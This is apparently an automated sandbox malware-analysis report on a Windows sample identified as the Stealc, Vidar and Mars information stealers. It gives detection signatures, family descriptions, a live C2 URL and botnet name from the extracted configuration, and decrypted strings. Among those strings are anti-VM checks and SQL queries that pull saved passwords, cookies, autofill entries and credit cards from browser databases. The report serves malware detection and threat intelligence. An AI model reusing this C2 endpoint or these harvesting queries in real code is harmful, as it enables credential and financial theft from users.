Windows Analysis Report
LisectAVT_2403002A_326.exe

Overview

General Information

Sample name: LisectAVT_2403002A_326.exe
Analysis ID: 1482336
MD5: 14e1e4337af72bdba22538a1bc405427
SHA1: 9bacc38599dab1dcf1216d24c2816a6f016ce04a
SHA256: 339ea64849ebf88f3c2f7195c572ff95bf71099eed82cee1af3f1d2b2b591c9e
Tags: exe
Infos:

Detection

Go Injector, Mars Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected Go Injector
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking computer name)
Found evasive API chain (may stop execution after checking locale)
Injects a PE file into a foreign processes
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: LisectAVT_2403002A_326.exe Avira: detected
Antivirus detection for URL or domain
Source: http://193.143.1.226/129edec4272dc2c8.php Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000000.00000002.1889291210.000000C000AA2000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": "http://193.143.1.226/129edec4272dc2c8.php"}
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack Malware Configuration Extractor: StealC {"C2 url": "http://193.143.1.226/129edec4272dc2c8.php", "Botnet": "newpakistan"}
Sample uses string decryption to hide its real strings
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: INSERT_KEY_HERE
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: 10
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: 04
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: 20
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: 24
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetProcAddress
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: LoadLibraryA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: lstrcatA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: OpenEventA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CreateEventA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CloseHandle
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Sleep
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetUserDefaultLangID
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: VirtualAllocExNuma
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: VirtualFree
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetSystemInfo
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: VirtualAlloc
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: HeapAlloc
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetComputerNameA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: lstrcpyA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetProcessHeap
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetCurrentProcess
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: lstrlenA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: ExitProcess
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GlobalMemoryStatusEx
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetSystemTime
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SystemTimeToFileTime
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: advapi32.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: gdi32.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: user32.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: crypt32.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: ntdll.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetUserNameA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CreateDCA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetDeviceCaps
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: ReleaseDC
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CryptStringToBinaryA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: sscanf
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: VMwareVMware
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: HAL9TH
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: JohnDoe
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: DISPLAY
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: %hu/%hu/%hu
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: http://193.143.1.226
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: /129edec4272dc2c8.php
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: /cdb52cf952e86d4b/
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: newpakistan
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetEnvironmentVariableA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetFileAttributesA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GlobalLock
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: HeapFree
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetFileSize
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GlobalSize
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CreateToolhelp32Snapshot
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: IsWow64Process
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Process32Next
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetLocalTime
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: FreeLibrary
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetTimeZoneInformation
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetSystemPowerStatus
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetVolumeInformationA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetWindowsDirectoryA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Process32First
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetLocaleInfoA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetUserDefaultLocaleName
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetModuleFileNameA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: DeleteFileA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: FindNextFileA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: LocalFree
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: FindClose
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SetEnvironmentVariableA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: LocalAlloc
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetFileSizeEx
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: ReadFile
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SetFilePointer
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: WriteFile
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CreateFileA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: FindFirstFileA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CopyFileA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: VirtualProtect
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetLastError
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: lstrcpynA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: MultiByteToWideChar
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GlobalFree
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: WideCharToMultiByte
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GlobalAlloc
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: OpenProcess
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: TerminateProcess
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetCurrentProcessId
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: gdiplus.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: ole32.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: bcrypt.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: wininet.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: shlwapi.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: shell32.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: psapi.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: rstrtmgr.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CreateCompatibleBitmap
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SelectObject
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: BitBlt
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: DeleteObject
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CreateCompatibleDC
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GdipGetImageEncodersSize
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GdipGetImageEncoders
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GdiplusStartup
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GdiplusShutdown
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GdipSaveImageToStream
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GdipDisposeImage
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GdipFree
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetHGlobalFromStream
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CreateStreamOnHGlobal
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CoUninitialize
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CoInitialize
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CoCreateInstance
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: BCryptDecrypt
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: BCryptSetProperty
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: BCryptDestroyKey
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetWindowRect
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetDesktopWindow
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetDC
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CloseWindow
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: wsprintfA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: EnumDisplayDevicesA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetKeyboardLayoutList
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CharToOemW
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: wsprintfW
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: RegQueryValueExA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: RegEnumKeyExA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: RegOpenKeyExA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: RegCloseKey
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: RegEnumValueA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CryptBinaryToStringA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CryptUnprotectData
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SHGetFolderPathA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: ShellExecuteExA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: InternetOpenUrlA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: InternetConnectA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: InternetCloseHandle
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: InternetOpenA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: HttpSendRequestA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: HttpOpenRequestA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: InternetReadFile
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: InternetCrackUrlA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: StrCmpCA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: StrStrA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: StrCmpCW
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: PathMatchSpecA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetModuleFileNameExA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: RmStartSession
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: RmRegisterResources
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: RmGetList
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: RmEndSession
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: sqlite3_open
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: sqlite3_prepare_v2
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: sqlite3_step
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: sqlite3_column_text
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: sqlite3_finalize
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: sqlite3_close
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: sqlite3_column_bytes
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: sqlite3_column_blob
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: encrypted_key
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: PATH
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: C:\ProgramData\nss3.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: NSS_Init
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: NSS_Shutdown
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: PK11_GetInternalKeySlot
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: PK11_FreeSlot
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: PK11_Authenticate
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: PK11SDR_Decrypt
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: C:\ProgramData\
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: browser:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: profile:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: url:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: login:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: password:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Opera
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: OperaGX
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Network
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: cookies
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: .txt
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: TRUE
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: FALSE
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: autofill
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SELECT name, value FROM autofill
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: history
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SELECT url FROM urls LIMIT 1000
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: cc
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: name:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: month:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: year:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: card:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Cookies
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Login Data
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Web Data
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: History
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: logins.json
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: formSubmitURL
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: usernameField
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: encryptedUsername
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: encryptedPassword
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: guid
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: cookies.sqlite
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: formhistory.sqlite
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: places.sqlite
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: plugins
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Local Extension Settings
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Sync Extension Settings
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: IndexedDB
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Opera Stable
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Opera GX Stable
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CURRENT
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: chrome-extension_
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: _0.indexeddb.leveldb
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Local State
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: profiles.ini
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: chrome
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: opera
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: firefox
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: wallets
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: %08lX%04lX%lu
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: ProductName
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: x32
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: x64
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: %d/%d/%d %d:%d:%d
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: ProcessorNameString
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: DisplayName
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: DisplayVersion
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Network Info:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - IP: IP?
